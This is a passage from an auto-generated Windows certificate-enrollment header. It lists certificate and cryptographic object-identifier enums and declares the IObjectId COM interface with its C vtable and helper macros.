        XCN_OID_INFOSEC_mosaicKMandSig	= 111,
        XCN_OID_INFOSEC_SuiteASignature	= 112,
        XCN_OID_INFOSEC_SuiteAConfidentiality	= 113,
        XCN_OID_INFOSEC_SuiteAIntegrity	= 114,
        XCN_OID_INFOSEC_SuiteATokenProtection	= 115,
        XCN_OID_INFOSEC_SuiteAKeyManagement	= 116,
        XCN_OID_INFOSEC_SuiteAKMandSig	= 117,
        XCN_OID_INFOSEC_mosaicUpdatedSig	= 118,
        XCN_OID_INFOSEC_mosaicKMandUpdSig	= 119,
        XCN_OID_INFOSEC_mosaicUpdatedInteg	= 120,
        XCN_OID_COMMON_NAME	= 121,
        XCN_OID_SUR_NAME	= 122,
        XCN_OID_DEVICE_SERIAL_NUMBER	= 123,
        XCN_OID_COUNTRY_NAME	= 124,
        XCN_OID_LOCALITY_NAME	= 125,
        XCN_OID_STATE_OR_PROVINCE_NAME	= 126,
        XCN_OID_STREET_ADDRESS	= 127,
        XCN_OID_ORGANIZATION_NAME	= 128,
        XCN_OID_ORGANIZATIONAL_UNIT_NAME	= 129,
        XCN_OID_TITLE	= 130,
        XCN_OID_DESCRIPTION	= 131,
        XCN_OID_SEARCH_GUIDE	= 132,
        XCN_OID_BUSINESS_CATEGORY	= 133,
        XCN_OID_POSTAL_ADDRESS	= 134,
        XCN_OID_POSTAL_CODE	= 135,
        XCN_OID_POST_OFFICE_BOX	= 136,
        XCN_OID_PHYSICAL_DELIVERY_OFFICE_NAME	= 137,
        XCN_OID_TELEPHONE_NUMBER	= 138,
        XCN_OID_TELEX_NUMBER	= 139,
        XCN_OID_TELETEXT_TERMINAL_IDENTIFIER	= 140,
        XCN_OID_FACSIMILE_TELEPHONE_NUMBER	= 141,
        XCN_OID_X21_ADDRESS	= 142,
        XCN_OID_INTERNATIONAL_ISDN_NUMBER	= 143,
        XCN_OID_REGISTERED_ADDRESS	= 144,
        XCN_OID_DESTINATION_INDICATOR	= 145,
        XCN_OID_PREFERRED_DELIVERY_METHOD	= 146,
        XCN_OID_PRESENTATION_ADDRESS	= 147,
        XCN_OID_SUPPORTED_APPLICATION_CONTEXT	= 148,
        XCN_OID_MEMBER	= 149,
        XCN_OID_OWNER	= 150,
        XCN_OID_ROLE_OCCUPANT	= 151,
        XCN_OID_SEE_ALSO	= 152,
        XCN_OID_USER_PASSWORD	= 153,
        XCN_OID_USER_CERTIFICATE	= 154,
        XCN_OID_CA_CERTIFICATE	= 155,
        XCN_OID_AUTHORITY_REVOCATION_LIST	= 156,
        XCN_OID_CERTIFICATE_REVOCATION_LIST	= 157,
        XCN_OID_CROSS_CERTIFICATE_PAIR	= 158,
        XCN_OID_GIVEN_NAME	= 159,
        XCN_OID_INITIALS	= 160,
        XCN_OID_DN_QUALIFIER	= 161,
        XCN_OID_DOMAIN_COMPONENT	= 162,
        XCN_OID_PKCS_12_FRIENDLY_NAME_ATTR	= 163,
        XCN_OID_PKCS_12_LOCAL_KEY_ID	= 164,
        XCN_OID_PKCS_12_KEY_PROVIDER_NAME_ATTR	= 165,
        XCN_OID_LOCAL_MACHINE_KEYSET	= 166,
        XCN_OID_PKCS_12_EXTENDED_ATTRIBUTES	= 167,
        XCN_OID_KEYID_RDN	= 168,
        XCN_OID_AUTHORITY_KEY_IDENTIFIER	= 169,
        XCN_OID_KEY_ATTRIBUTES	= 170,
        XCN_OID_CERT_POLICIES_95	= 171,
        XCN_OID_KEY_USAGE_RESTRICTION	= 172,
        XCN_OID_SUBJECT_ALT_NAME	= 173,
        XCN_OID_ISSUER_ALT_NAME	= 174,
        XCN_OID_BASIC_CONSTRAINTS	= 175,
        XCN_OID_KEY_USAGE	= 176,
        XCN_OID_PRIVATEKEY_USAGE_PERIOD	= 177,
        XCN_OID_BASIC_CONSTRAINTS2	= 178,
        XCN_OID_CERT_POLICIES	= 179,
        XCN_OID_ANY_CERT_POLICY	= 180,
        XCN_OID_AUTHORITY_KEY_IDENTIFIER2	= 181,
        XCN_OID_SUBJECT_KEY_IDENTIFIER	= 182,
        XCN_OID_SUBJECT_ALT_NAME2	= 183,
        XCN_OID_ISSUER_ALT_NAME2	= 184,
        XCN_OID_CRL_REASON_CODE	= 185,
        XCN_OID_REASON_CODE_HOLD	= 186,
        XCN_OID_CRL_DIST_POINTS	= 187,
        XCN_OID_ENHANCED_KEY_USAGE	= 188,
        XCN_OID_CRL_NUMBER	= 189,
        XCN_OID_DELTA_CRL_INDICATOR	= 190,
        XCN_OID_ISSUING_DIST_POINT	= 191,
        XCN_OID_FRESHEST_CRL	= 192,
        XCN_OID_NAME_CONSTRAINTS	= 193,
        XCN_OID_POLICY_MAPPINGS	= 194,
        XCN_OID_LEGACY_POLICY_MAPPINGS	= 195,
        XCN_OID_POLICY_CONSTRAINTS	= 196,
        XCN_OID_RENEWAL_CERTIFICATE	= 197,
        XCN_OID_ENROLLMENT_NAME_VALUE_PAIR	= 198,
        XCN_OID_ENROLLMENT_CSP_PROVIDER	= 199,
        XCN_OID_OS_VERSION	= 200,
        XCN_OID_ENROLLMENT_AGENT	= 201,
        XCN_OID_PKIX	= 202,
        XCN_OID_PKIX_PE	= 203,
        XCN_OID_AUTHORITY_INFO_ACCESS	= 204,
        XCN_OID_BIOMETRIC_EXT	= 205,
        XCN_OID_LOGOTYPE_EXT	= 206,
        XCN_OID_CERT_EXTENSIONS	= 207,
        XCN_OID_NEXT_UPDATE_LOCATION	= 208,
        XCN_OID_REMOVE_CERTIFICATE	= 209,
        XCN_OID_CROSS_CERT_DIST_POINTS	= 210,
        XCN_OID_CTL	= 211,
        XCN_OID_SORTED_CTL	= 212,
        XCN_OID_SERIALIZED	= 213,
        XCN_OID_NT_PRINCIPAL_NAME	= 214,
        XCN_OID_PRODUCT_UPDATE	= 215,
        XCN_OID_ANY_APPLICATION_POLICY	= 216,
        XCN_OID_AUTO_ENROLL_CTL_USAGE	= 217,
        XCN_OID_ENROLL_CERTTYPE_EXTENSION	= 218,
        XCN_OID_CERT_MANIFOLD	= 219,
        XCN_OID_CERTSRV_CA_VERSION	= 220,
        XCN_OID_CERTSRV_PREVIOUS_CERT_HASH	= 221,
        XCN_OID_CRL_VIRTUAL_BASE	= 222,
        XCN_OID_CRL_NEXT_PUBLISH	= 223,
        XCN_OID_KP_CA_EXCHANGE	= 224,
        XCN_OID_KP_KEY_RECOVERY_AGENT	= 225,
        XCN_OID_CERTIFICATE_TEMPLATE	= 226,
        XCN_OID_ENTERPRISE_OID_ROOT	= 227,
        XCN_OID_RDN_DUMMY_SIGNER	= 228,
        XCN_OID_APPLICATION_CERT_POLICIES	= 229,
        XCN_OID_APPLICATION_POLICY_MAPPINGS	= 230,
        XCN_OID_APPLICATION_POLICY_CONSTRAINTS	= 231,
        XCN_OID_ARCHIVED_KEY_ATTR	= 232,
        XCN_OID_CRL_SELF_CDP	= 233,
        XCN_OID_REQUIRE_CERT_CHAIN_POLICY	= 234,
        XCN_OID_ARCHIVED_KEY_CERT_HASH	= 235,
        XCN_OID_ISSUED_CERT_HASH	= 236,
        XCN_OID_DS_EMAIL_REPLICATION	= 237,
        XCN_OID_REQUEST_CLIENT_INFO	= 238,
        XCN_OID_ENCRYPTED_KEY_HASH	= 239,
        XCN_OID_CERTSRV_CROSSCA_VERSION	= 240,
        XCN_OID_NTDS_REPLICATION	= 241,
        XCN_OID_SUBJECT_DIR_ATTRS	= 242,
        XCN_OID_PKIX_KP	= 243,
        XCN_OID_PKIX_KP_SERVER_AUTH	= 244,
        XCN_OID_PKIX_KP_CLIENT_AUTH	= 245,
        XCN_OID_PKIX_KP_CODE_SIGNING	= 246,
        XCN_OID_PKIX_KP_EMAIL_PROTECTION	= 247,
        XCN_OID_PKIX_KP_IPSEC_END_SYSTEM	= 248,
        XCN_OID_PKIX_KP_IPSEC_TUNNEL	= 249,
        XCN_OID_PKIX_KP_IPSEC_USER	= 250,
        XCN_OID_PKIX_KP_TIMESTAMP_SIGNING	= 251,
        XCN_OID_PKIX_KP_OCSP_SIGNING	= 252,
        XCN_OID_PKIX_OCSP_NOCHECK	= 253,
        XCN_OID_IPSEC_KP_IKE_INTERMEDIATE	= 254,
        XCN_OID_KP_CTL_USAGE_SIGNING	= 255,
        XCN_OID_KP_TIME_STAMP_SIGNING	= 256,
        XCN_OID_SERVER_GATED_CRYPTO	= 257,
        XCN_OID_SGC_NETSCAPE	= 258,
        XCN_OID_KP_EFS	= 259,
        XCN_OID_EFS_RECOVERY	= 260,
        XCN_OID_WHQL_CRYPTO	= 261,
        XCN_OID_NT5_CRYPTO	= 262,
        XCN_OID_OEM_WHQL_CRYPTO	= 263,
        XCN_OID_EMBEDDED_NT_CRYPTO	= 264,
        XCN_OID_ROOT_LIST_SIGNER	= 265,
        XCN_OID_KP_QUALIFIED_SUBORDINATION	= 266,
        XCN_OID_KP_KEY_RECOVERY	= 267,
        XCN_OID_KP_DOCUMENT_SIGNING	= 268,
        XCN_OID_KP_LIFETIME_SIGNING	= 269,
        XCN_OID_KP_MOBILE_DEVICE_SOFTWARE	= 270,
        XCN_OID_KP_SMART_DISPLAY	= 271,
        XCN_OID_KP_CSP_SIGNATURE	= 272,
        XCN_OID_DRM	= 273,
        XCN_OID_DRM_INDIVIDUALIZATION	= 274,
        XCN_OID_LICENSES	= 275,
        XCN_OID_LICENSE_SERVER	= 276,
        XCN_OID_KP_SMARTCARD_LOGON	= 277,
        XCN_OID_YESNO_TRUST_ATTR	= 278,
        XCN_OID_PKIX_POLICY_QUALIFIER_CPS	= 279,
        XCN_OID_PKIX_POLICY_QUALIFIER_USERNOTICE	= 280,
        XCN_OID_CERT_POLICIES_95_QUALIFIER1	= 281,
        XCN_OID_PKIX_ACC_DESCR	= 282,
        XCN_OID_PKIX_OCSP	= 283,
        XCN_OID_PKIX_CA_ISSUERS	= 284,
        XCN_OID_VERISIGN_PRIVATE_6_9	= 285,
        XCN_OID_VERISIGN_ONSITE_JURISDICTION_HASH	= 286,
        XCN_OID_VERISIGN_BITSTRING_6_13	= 287,
        XCN_OID_VERISIGN_ISS_STRONG_CRYPTO	= 288,
        XCN_OID_NETSCAPE	= 289,
        XCN_OID_NETSCAPE_CERT_EXTENSION	= 290,
        XCN_OID_NETSCAPE_CERT_TYPE	= 291,
        XCN_OID_NETSCAPE_BASE_URL	= 292,
        XCN_OID_NETSCAPE_REVOCATION_URL	= 293,
        XCN_OID_NETSCAPE_CA_REVOCATION_URL	= 294,
        XCN_OID_NETSCAPE_CERT_RENEWAL_URL	= 295,
        XCN_OID_NETSCAPE_CA_POLICY_URL	= 296,
        XCN_OID_NETSCAPE_SSL_SERVER_NAME	= 297,
        XCN_OID_NETSCAPE_COMMENT	= 298,
        XCN_OID_NETSCAPE_DATA_TYPE	= 299,
        XCN_OID_NETSCAPE_CERT_SEQUENCE	= 300,
        XCN_OID_CT_PKI_DATA	= 301,
        XCN_OID_CT_PKI_RESPONSE	= 302,
        XCN_OID_PKIX_NO_SIGNATURE	= 303,
        XCN_OID_CMC	= 304,
        XCN_OID_CMC_STATUS_INFO	= 305,
        XCN_OID_CMC_IDENTIFICATION	= 306,
        XCN_OID_CMC_IDENTITY_PROOF	= 307,
        XCN_OID_CMC_DATA_RETURN	= 308,
        XCN_OID_CMC_TRANSACTION_ID	= 309,
        XCN_OID_CMC_SENDER_NONCE	= 310,
        XCN_OID_CMC_RECIPIENT_NONCE	= 311,
        XCN_OID_CMC_ADD_EXTENSIONS	= 312,
        XCN_OID_CMC_ENCRYPTED_POP	= 313,
        XCN_OID_CMC_DECRYPTED_POP	= 314,
        XCN_OID_CMC_LRA_POP_WITNESS	= 315,
        XCN_OID_CMC_GET_CERT	= 316,
        XCN_OID_CMC_GET_CRL	= 317,
        XCN_OID_CMC_REVOKE_REQUEST	= 318,
        XCN_OID_CMC_REG_INFO	= 319,
        XCN_OID_CMC_RESPONSE_INFO	= 320,
        XCN_OID_CMC_QUERY_PENDING	= 321,
        XCN_OID_CMC_ID_POP_LINK_RANDOM	= 322,
        XCN_OID_CMC_ID_POP_LINK_WITNESS	= 323,
        XCN_OID_CMC_ID_CONFIRM_CERT_ACCEPTANCE	= 324,
        XCN_OID_CMC_ADD_ATTRIBUTES	= 325,
        XCN_OID_LOYALTY_OTHER_LOGOTYPE	= 326,
        XCN_OID_BACKGROUND_OTHER_LOGOTYPE	= 327,
        XCN_OID_PKIX_OCSP_BASIC_SIGNED_RESPONSE	= 328,
        XCN_OID_PKCS_7_DATA	= 329,
        XCN_OID_PKCS_7_SIGNED	= 330,
        XCN_OID_PKCS_7_ENVELOPED	= 331,
        XCN_OID_PKCS_7_SIGNEDANDENVELOPED	= 332,
        XCN_OID_PKCS_7_DIGESTED	= 333,
        XCN_OID_PKCS_7_ENCRYPTED	= 334,
        XCN_OID_PKCS_9_CONTENT_TYPE	= 335,
        XCN_OID_PKCS_9_MESSAGE_DIGEST	= 336,
        XCN_OID_CERT_PROP_ID_PREFIX	= 337,
        XCN_OID_CERT_KEY_IDENTIFIER_PROP_ID	= 338,
        XCN_OID_CERT_ISSUER_SERIAL_NUMBER_MD5_HASH_PROP_ID	= 339,
        XCN_OID_CERT_SUBJECT_NAME_MD5_HASH_PROP_ID	= 340,
        XCN_OID_CERT_MD5_HASH_PROP_ID	= 341,
        XCN_OID_RSA_SHA256RSA	= 342,
        XCN_OID_RSA_SHA384RSA	= 343,
        XCN_OID_RSA_SHA512RSA	= 344,
        XCN_OID_NIST_sha256	= 345,
        XCN_OID_NIST_sha384	= 346,
        XCN_OID_NIST_sha512	= 347,
        XCN_OID_RSA_MGF1	= 348,
        XCN_OID_ECC_PUBLIC_KEY	= 349,
        XCN_OID_ECDSA_SHA1	= 350,
        XCN_OID_ECDSA_SPECIFIED	= 351,
        XCN_OID_ANY_ENHANCED_KEY_USAGE	= 352,
        XCN_OID_RSA_SSA_PSS	= 353,
        XCN_OID_ATTR_SUPPORTED_ALGORITHMS	= 355,
        XCN_OID_ATTR_TPM_SECURITY_ASSERTIONS	= 356,
        XCN_OID_ATTR_TPM_SPECIFICATION	= 357,
        XCN_OID_CERT_DISALLOWED_FILETIME_PROP_ID	= 358,
        XCN_OID_CERT_SIGNATURE_HASH_PROP_ID	= 359,
        XCN_OID_CERT_STRONG_KEY_OS_1	= 360,
        XCN_OID_CERT_STRONG_KEY_OS_CURRENT	= 361,
        XCN_OID_CERT_STRONG_KEY_OS_PREFIX	= 362,
        XCN_OID_CERT_STRONG_SIGN_OS_1	= 363,
        XCN_OID_CERT_STRONG_SIGN_OS_CURRENT	= 364,
        XCN_OID_CERT_STRONG_SIGN_OS_PREFIX	= 365,
        XCN_OID_DH_SINGLE_PASS_STDDH_SHA1_KDF	= 366,
        XCN_OID_DH_SINGLE_PASS_STDDH_SHA256_KDF	= 367,
        XCN_OID_DH_SINGLE_PASS_STDDH_SHA384_KDF	= 368,
        XCN_OID_DISALLOWED_HASH	= 369,
        XCN_OID_DISALLOWED_LIST	= 370,
        XCN_OID_ECC_CURVE_P256	= 371,
        XCN_OID_ECC_CURVE_P384	= 372,
        XCN_OID_ECC_CURVE_P521	= 373,
        XCN_OID_ECDSA_SHA256	= 374,
        XCN_OID_ECDSA_SHA384	= 375,
        XCN_OID_ECDSA_SHA512	= 376,
        XCN_OID_ENROLL_CAXCHGCERT_HASH	= 377,
        XCN_OID_ENROLL_EK_INFO	= 378,
        XCN_OID_ENROLL_EKPUB_CHALLENGE	= 379,
        XCN_OID_ENROLL_EKVERIFYCERT	= 380,
        XCN_OID_ENROLL_EKVERIFYCREDS	= 381,
        XCN_OID_ENROLL_EKVERIFYKEY	= 382,
        XCN_OID_EV_RDN_COUNTRY	= 383,
        XCN_OID_EV_RDN_LOCALE	= 384,
        XCN_OID_EV_RDN_STATE_OR_PROVINCE	= 385,
        XCN_OID_INHIBIT_ANY_POLICY	= 386,
        XCN_OID_INTERNATIONALIZED_EMAIL_ADDRESS	= 387,
        XCN_OID_KP_KERNEL_MODE_CODE_SIGNING	= 388,
        XCN_OID_KP_KERNEL_MODE_HAL_EXTENSION_SIGNING	= 389,
        XCN_OID_KP_KERNEL_MODE_TRUSTED_BOOT_SIGNING	= 390,
        XCN_OID_KP_TPM_AIK_CERTIFICATE	= 391,
        XCN_OID_KP_TPM_EK_CERTIFICATE	= 392,
        XCN_OID_KP_TPM_PLATFORM_CERTIFICATE	= 393,
        XCN_OID_NIST_AES128_CBC	= 394,
        XCN_OID_NIST_AES128_WRAP	= 395,
        XCN_OID_NIST_AES192_CBC	= 396,
        XCN_OID_NIST_AES192_WRAP	= 397,
        XCN_OID_NIST_AES256_CBC	= 398,
        XCN_OID_NIST_AES256_WRAP	= 399,
        XCN_OID_PKCS_12_PbeIds	= 400,
        XCN_OID_PKCS_12_pbeWithSHA1And128BitRC2	= 401,
        XCN_OID_PKCS_12_pbeWithSHA1And128BitRC4	= 402,
        XCN_OID_PKCS_12_pbeWithSHA1And2KeyTripleDES	= 403,
        XCN_OID_PKCS_12_pbeWithSHA1And3KeyTripleDES	= 404,
        XCN_OID_PKCS_12_pbeWithSHA1And40BitRC2	= 405,
        XCN_OID_PKCS_12_pbeWithSHA1And40BitRC4	= 406,
        XCN_OID_PKCS_12_PROTECTED_PASSWORD_SECRET_BAG_TYPE_ID	= 407,
        XCN_OID_PKINIT_KP_KDC	= 408,
        XCN_OID_PKIX_CA_REPOSITORY	= 409,
        XCN_OID_PKIX_OCSP_NONCE	= 410,
        XCN_OID_PKIX_TIME_STAMPING	= 411,
        XCN_OID_QC_EU_COMPLIANCE	= 412,
        XCN_OID_QC_SSCD	= 413,
        XCN_OID_QC_STATEMENTS_EXT	= 414,
        XCN_OID_RDN_TPM_MANUFACTURER	= 415,
        XCN_OID_RDN_TPM_MODEL	= 416,
        XCN_OID_RDN_TPM_VERSION	= 417,
        XCN_OID_REVOKED_LIST_SIGNER	= 418,
        XCN_OID_RFC3161_counterSign	= 419,
        XCN_OID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION	= 420,
        XCN_OID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION	= 421,
        XCN_OID_ROOT_PROGRAM_FLAGS	= 422,
        XCN_OID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL	= 423,
        XCN_OID_RSA_PSPECIFIED	= 424,
        XCN_OID_RSAES_OAEP	= 425,
        XCN_OID_SUBJECT_INFO_ACCESS	= 426,
        XCN_OID_TIMESTAMP_TOKEN	= 427,
        XCN_OID_ENROLL_SCEP_ERROR	= 428,
        XCN_OIDVerisign_MessageType	= 429,
        XCN_OIDVerisign_PkiStatus	= 430,
        XCN_OIDVerisign_FailInfo	= 431,
        XCN_OIDVerisign_SenderNonce	= 432,
        XCN_OIDVerisign_RecipientNonce	= 433,
        XCN_OIDVerisign_TransactionID	= 434,
        XCN_OID_ENROLL_ATTESTATION_CHALLENGE	= 435,
        XCN_OID_ENROLL_ATTESTATION_STATEMENT	= 436,
        XCN_OID_ENROLL_ENCRYPTION_ALGORITHM	= 437,
        XCN_OID_ENROLL_KSP_NAME	= 438
    } 	CERTENROLL_OBJECTID;

typedef 
enum WebSecurityLevel
    {
        LevelUnsafe	= 0,
        LevelSafe	= 1
    } 	WebSecurityLevel;

#define	CERTENROLL_INDEX_BASE	( 0 )

typedef 
enum EncodingType
    {
        XCN_CRYPT_STRING_BASE64HEADER	= 0,
        XCN_CRYPT_STRING_BASE64	= 0x1,
        XCN_CRYPT_STRING_BINARY	= 0x2,
        XCN_CRYPT_STRING_BASE64REQUESTHEADER	= 0x3,
        XCN_CRYPT_STRING_HEX	= 0x4,
        XCN_CRYPT_STRING_HEXASCII	= 0x5,
        XCN_CRYPT_STRING_BASE64_ANY	= 0x6,
        XCN_CRYPT_STRING_ANY	= 0x7,
        XCN_CRYPT_STRING_HEX_ANY	= 0x8,
        XCN_CRYPT_STRING_BASE64X509CRLHEADER	= 0x9,
        XCN_CRYPT_STRING_HEXADDR	= 0xa,
        XCN_CRYPT_STRING_HEXASCIIADDR	= 0xb,
        XCN_CRYPT_STRING_HEXRAW	= 0xc,
        XCN_CRYPT_STRING_BASE64URI	= 0xd,
        XCN_CRYPT_STRING_ENCODEMASK	= 0xff,
        XCN_CRYPT_STRING_CHAIN	= 0x100,
        XCN_CRYPT_STRING_TEXT	= 0x200,
        XCN_CRYPT_STRING_PERCENTESCAPE	= 0x8000000,
        XCN_CRYPT_STRING_HASHDATA	= 0x10000000,
        XCN_CRYPT_STRING_STRICT	= 0x20000000,
        XCN_CRYPT_STRING_NOCRLF	= 0x40000000,
        XCN_CRYPT_STRING_NOCR	= 0x80000000
    } 	EncodingType;

typedef 
enum PFXExportOptions
    {
        PFXExportEEOnly	= 0,
        PFXExportChainNoRoot	= 1,
        PFXExportChainWithRoot	= 2
    } 	PFXExportOptions;

typedef 
enum ObjectIdGroupId
    {
        XCN_CRYPT_ANY_GROUP_ID	= 0,
        XCN_CRYPT_HASH_ALG_OID_GROUP_ID	= 1,
        XCN_CRYPT_ENCRYPT_ALG_OID_GROUP_ID	= 2,
        XCN_CRYPT_PUBKEY_ALG_OID_GROUP_ID	= 3,
        XCN_CRYPT_SIGN_ALG_OID_GROUP_ID	= 4,
        XCN_CRYPT_RDN_ATTR_OID_GROUP_ID	= 5,
        XCN_CRYPT_EXT_OR_ATTR_OID_GROUP_ID	= 6,
        XCN_CRYPT_ENHKEY_USAGE_OID_GROUP_ID	= 7,
        XCN_CRYPT_POLICY_OID_GROUP_ID	= 8,
        XCN_CRYPT_TEMPLATE_OID_GROUP_ID	= 9,
        XCN_CRYPT_LAST_OID_GROUP_ID	= 10,
        XCN_CRYPT_FIRST_ALG_OID_GROUP_ID	= 1,
        XCN_CRYPT_LAST_ALG_OID_GROUP_ID	= 4,
        XCN_CRYPT_GROUP_ID_MASK	= 0xffff,
        XCN_CRYPT_OID_PREFER_CNG_ALGID_FLAG	= 0x40000000,
        XCN_CRYPT_OID_DISABLE_SEARCH_DS_FLAG	= 0x80000000,
        XCN_CRYPT_OID_INFO_OID_GROUP_BIT_LEN_MASK	= 0xfff0000,
        XCN_CRYPT_OID_INFO_OID_GROUP_BIT_LEN_SHIFT	= 16,
        XCN_CRYPT_KEY_LENGTH_MASK	= 0xfff0000
    } 	ObjectIdGroupId;

typedef 
enum ObjectIdPublicKeyFlags
    {
        XCN_CRYPT_OID_INFO_PUBKEY_ANY	= 0,
        XCN_CRYPT_OID_INFO_PUBKEY_SIGN_KEY_FLAG	= 0x80000000,
        XCN_CRYPT_OID_INFO_PUBKEY_ENCRYPT_KEY_FLAG	= 0x40000000
    } 	ObjectIdPublicKeyFlags;

typedef 
enum AlgorithmFlags
    {
        AlgorithmFlagsNone	= 0,
        AlgorithmFlagsWrap	= 0x1
    } 	AlgorithmFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0000_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0000_v0_0_s_ifspec;

#ifndef __IObjectId_INTERFACE_DEFINED__
#define __IObjectId_INTERFACE_DEFINED__

/* interface IObjectId */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IObjectId;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab300-217d-11da-b2a4-000e7bbb2b09")
    IObjectId : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromName( 
            /* [in] */ CERTENROLL_OBJECTID Name) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromValue( 
            /* [in] */ __RPC__in BSTR strValue) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromAlgorithmName( 
            /* [in] */ ObjectIdGroupId GroupId,
            /* [in] */ ObjectIdPublicKeyFlags KeyFlags,
            /* [in] */ AlgorithmFlags AlgFlags,
            /* [in] */ __RPC__in BSTR strAlgorithmName) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Name( 
            /* [retval][out] */ __RPC__out CERTENROLL_OBJECTID *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_FriendlyName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_FriendlyName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Value( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetAlgorithmName( 
            /* [in] */ ObjectIdGroupId GroupId,
            /* [in] */ ObjectIdPublicKeyFlags KeyFlags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrAlgorithmName) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IObjectIdVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IObjectId * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IObjectId * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IObjectId * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IObjectId * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IObjectId * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IObjectId * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IObjectId * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromName )( 
            __RPC__in IObjectId * This,
            /* [in] */ CERTENROLL_OBJECTID Name);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromValue )( 
            __RPC__in IObjectId * This,
            /* [in] */ __RPC__in BSTR strValue);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromAlgorithmName )( 
            __RPC__in IObjectId * This,
            /* [in] */ ObjectIdGroupId GroupId,
            /* [in] */ ObjectIdPublicKeyFlags KeyFlags,
            /* [in] */ AlgorithmFlags AlgFlags,
            /* [in] */ __RPC__in BSTR strAlgorithmName);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Name )( 
            __RPC__in IObjectId * This,
            /* [retval][out] */ __RPC__out CERTENROLL_OBJECTID *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_FriendlyName )( 
            __RPC__in IObjectId * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_FriendlyName )( 
            __RPC__in IObjectId * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Value )( 
            __RPC__in IObjectId * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetAlgorithmName )( 
            __RPC__in IObjectId * This,
            /* [in] */ ObjectIdGroupId GroupId,
            /* [in] */ ObjectIdPublicKeyFlags KeyFlags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrAlgorithmName);
        
        END_INTERFACE
    } IObjectIdVtbl;

    interface IObjectId
    {
        CONST_VTBL struct IObjectIdVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IObjectId_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IObjectId_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IObjectId_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IObjectId_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IObjectId_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IObjectId_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IObjectId_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IObjectId_InitializeFromName(This,Name)	\
